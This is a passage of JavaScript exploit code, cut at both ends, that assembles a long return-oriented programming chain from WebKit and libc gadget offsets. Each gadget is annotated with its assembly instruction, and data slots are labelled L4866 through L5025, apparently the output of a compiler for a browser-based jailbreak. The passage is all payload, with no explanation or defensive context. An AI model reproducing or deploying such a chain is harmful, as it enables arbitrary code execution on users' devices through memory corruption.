//L4867 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+261800, //L4868 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+261768, //L4866 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L4866: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4867: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4868: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+261912, //L4870 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+261960, //L4873 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+261928, //L4871 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L4870: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4871: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4872: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4873: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+262072, //L4874+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+262064, //L4874 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L4874: db([0, 0]); // 0x0 set_gadgets([ ropchain+262088, //L4874+24 ropchain+271584, //L4869 libc_base+764760, //pop rsi ropchain+262128, //L4875 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L4875: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4877: db([64, 
0]); // 0x40 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+262248, //L4880 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+262232, //L4878 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4878: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4880: db([0, 0]); // 0x0 set_gadgets([ libc_base+223440, //mov al, [rdi] libc_base+764760, //pop rsi ropchain+262408, //L4884 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+262376, //L4882 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+262392, //L4883 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4881: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L4882: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4883: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4884: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+262464, //L4886 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L4886: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+262592, //L4888 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+262608, //L4889 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+262576, //L4887 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4887: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L4888: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4889: db([0, 
0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+262768, //L4893 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+262736, //L4891 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+262752, //L4892 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4890: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L4891: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4892: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4893: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+262824, //L4895 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L4895: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+262952, //L4897 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+262968, //L4898 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+262936, //L4896 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4896: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L4897: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4898: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+263080, //L4900 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+263128, //L4903 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+263096, //L4901 webkit_base+660161, //mov [rsi], rax ; 
mov al, 1 webkit_base+3236123 //pop r9 ]); //L4900: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4901: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4902: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4903: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+263240, //L4904+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+263232, //L4904 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L4904: db([0, 0]); // 0x0 set_gadgets([ ropchain+263256, //L4904+24 ropchain+265280, //L4899 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+263296, //L4905 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L4905: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4906: db([45, 0]); // 0x2d set_gadget(libc_base+144605,); //pop rdi //L4907: db([45, 0]); // 0x2d set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+263488, //L4911 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+263456, //L4909 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+263472, //L4910 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4908: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L4909: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4910: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4911: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+263544, //L4913 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, 
//mov rax, rdi libc_base+144605 //pop rdi ]); //L4913: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+263672, //L4915 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+263688, //L4916 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+263656, //L4914 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4914: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L4915: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4916: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+263784, //L4918 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+263768, //L4917 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L4917: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4918: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+263864, //L4919 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L4919: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4921: db([48, 0]); // 0x30 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+263984, //L4924 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+263968, //L4922 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4922: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4924: db([0, 0]); // 0x0 set_gadgets([ 
libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+264128, //L4927 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+264096, //L4925 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+264112, //L4926 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4925: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4926: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4927: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+264200, //L4929 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4929: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+264256, //L4930 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4930: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+264336, //L4932 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L4932: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4934: db([56, 0]); // 0x38 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+264456, //L4937 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+264440, //L4935 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4935: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop 
rdi //L4937: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+264600, //L4940 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+264568, //L4938 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+264584, //L4939 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4938: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4939: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4940: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+264688, //L4942 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L4941: db([1, 0]); // 0x1 set_gadget(libc_base+759608,); //pop rax //L4942: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+264744, //L4943 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L4943: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4945: db([56, 0]); // 0x38 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+764760, //pop rsi ropchain+264824, //L4947 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4947: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+264928, //L4948 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+264944, 
//L4949 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4948: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4949: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+265032, //L4951 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4951: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+265088, //L4952 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4952: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+265160, //L4955 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4955: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+265216, //L4956 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4956: db([0, 0]); // 0x0 set_gadgets([ webkit_base+1121481, //mov [rax], cl libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+782311, //pop rsp ropchain+271584, //L4958 //L4899: libc_base+764760, //pop rsi ropchain+265320, //L4959 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L4959: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4961: db([96, 0]); // 0x60 set_gadgets([ libc_base+501454, //add rax, 
rsi libc_base+764760, //pop rsi ropchain+265440, //L4964 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+265424, //L4962 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4962: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4964: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+265616, //L4967 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+265632, //L4968 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+265584, //L4965 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+265600, //L4966 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4965: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L4966: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4967: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4968: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+265728, //L4970 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+265712, //L4969 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L4969: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4970: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L4971: db([1, 0]); // 0x1 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi 
libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L4972: db([2, 0]); // 0x2 set_gadget(libc_base+763368,); //pop rcx //L4973: db([2, 0]); // 0x2 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+265928, //L4975 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4975: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+265984, //L4976 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4976: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+14664103, //and rax, rcx libc_base+764760, //pop rsi ropchain+266120, //L4980 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+266104, //L4979 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4978: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L4979: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4980: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+266256, //L4983 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+266288, //L4985 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+266240, //L4982 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4982: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L4983: 
db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4984: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4985: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+266400, //L4986+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+266392, //L4986 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L4986: db([0, 0]); // 0x0 set_gadgets([ ropchain+266416, //L4986+24 ropchain+268440, //L4981 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+266456, //L4987 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L4987: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4988: db([43, 0]); // 0x2b set_gadget(libc_base+144605,); //pop rdi //L4989: db([43, 0]); // 0x2b set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+266648, //L4993 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+266616, //L4991 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+266632, //L4992 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4990: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L4991: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4992: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4993: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+266704, //L4995 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L4995: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl 
libc_base+764760, //pop rsi ropchain+266832, //L4997 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+266848, //L4998 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+266816, //L4996 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4996: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L4997: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4998: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+266944, //L5000 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+266928, //L4999 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L4999: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5000: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+267024, //L5001 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L5001: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5003: db([48, 0]); // 0x30 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+267144, //L5006 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+267128, //L5004 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5004: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5006: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+267288, //L5009 webkit_base+660161, //mov [rsi], 
rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+267256, //L5007 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+267272, //L5008 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5007: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5008: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5009: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+267360, //L5011 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5011: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+267416, //L5012 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5012: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+267496, //L5014 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L5014: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5016: db([56, 0]); // 0x38 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+267616, //L5019 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+267600, //L5017 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5017: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5019: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi 
ropchain+267760, //L5022 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+267728, //L5020 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+267744, //L5021 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5020: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5021: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5022: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+267848, //L5024 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L5023: db([1, 0]); // 0x1 set_gadget(libc_base+759608,); //pop rax //L5024: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+267904, //L5025 webkit_base+660161, //mov [rsi], rax ; mov al, 1 